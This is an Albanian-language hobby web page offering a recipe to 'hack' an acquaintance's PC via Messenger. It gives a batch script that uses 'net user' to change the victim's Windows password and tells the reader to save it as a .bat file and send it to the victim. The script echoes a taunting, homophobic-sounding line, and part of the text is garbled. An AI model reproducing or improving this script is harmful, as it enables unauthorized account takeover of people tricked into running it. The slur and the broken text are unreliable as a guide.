Mire Se Vini
  hacko pc e dikujna permes messengerit
 
kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani


Kodi:
1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pausemos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon

 

 
  Today, there have been 9 visitors (17 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free